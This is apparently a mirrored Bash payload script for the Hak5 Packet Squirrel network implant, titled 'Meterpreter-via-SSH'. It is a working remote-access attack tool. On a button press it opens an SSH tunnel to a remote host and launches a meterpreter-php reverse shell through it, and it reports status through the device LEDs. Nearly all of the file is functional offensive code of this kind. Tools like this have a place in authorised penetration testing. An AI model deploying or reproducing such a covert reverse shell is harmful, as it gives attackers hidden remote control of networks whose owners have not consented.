mirror of
https://github.com/hak5/packetsquirrel-payloads.git
synced 2025-12-19 17:58:49 +00:00
79 lines
2.4 KiB
Bash
Executable File
79 lines
2.4 KiB
Bash
Executable File
#!/bin/bash
|
|
#
|
|
# This payload is for the original Packet Squirrel. It may not work on
|
|
# the Packet Squirrel Mark II
|
|
#
|
|
# Title: Meterpreter-via-SSH
|
|
# Description: Covert meterpreter shell via overt SSH connection
|
|
# Author: Zappus
|
|
# Version: 1.0
|
|
# Category: Remote-Access
|
|
# Net Mode: NAT
|
|
# Firmware: 1.2
|
|
#
|
|
# LED State Descriptions
|
|
# Magenta Solid - Configuring NETMODE
|
|
# LED OFF - Waiting for BUTTON
|
|
# Red Blink 2 Times - SSH Connection Failed
|
|
# Amber Blink 5 Times - SSH Connection Successful
|
|
# Red Blink 1 Time - Meterpreter Failed
|
|
# Cyan Blink 1 Time - Meterpreter Successful
|
|
|
|
|
|
SSH_USER="username"
|
|
SSH_HOST="hostname"
|
|
MSF_PORT=31337
|
|
|
|
function start()
|
|
{
|
|
LED SETUP
|
|
NETMODE NAT
|
|
sleep 5
|
|
LED OFF
|
|
|
|
# Wait until BUTTON is pressed
|
|
while true
|
|
do
|
|
NO_LED=1 BUTTON && {
|
|
# close any existing meterpreter and SSH connections
|
|
kill `pgrep php` 2> /dev/null
|
|
kill `pgrep -x ssh` 2> /dev/null
|
|
sleep 2
|
|
|
|
# Establish connection to remote SSH server
|
|
ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST
|
|
|
|
# Check if SSH connection worked
|
|
if [ -z `pgrep -x ssh` ]
|
|
then
|
|
LED FAIL
|
|
sleep 5
|
|
LED OFF
|
|
continue
|
|
else
|
|
LED STAGE1
|
|
sleep 5
|
|
fi
|
|
|
|
# Start meterpreter reverse shell
|
|
meterpreter-php 127.0.0.1 $MSF_PORT &
|
|
sleep 2
|
|
|
|
# Check if meterpreter shell started
|
|
if [ -z `pgrep php` ]
|
|
then
|
|
# Close SSH connection because meterpreter failed
|
|
kill `pgrep -x ssh` 2> /dev/null
|
|
LED FAIL
|
|
else
|
|
LED SPECIAL
|
|
fi
|
|
sleep 1
|
|
LED OFF
|
|
}
|
|
done
|
|
}
|
|
|
|
# Start the payload
|
|
start &
|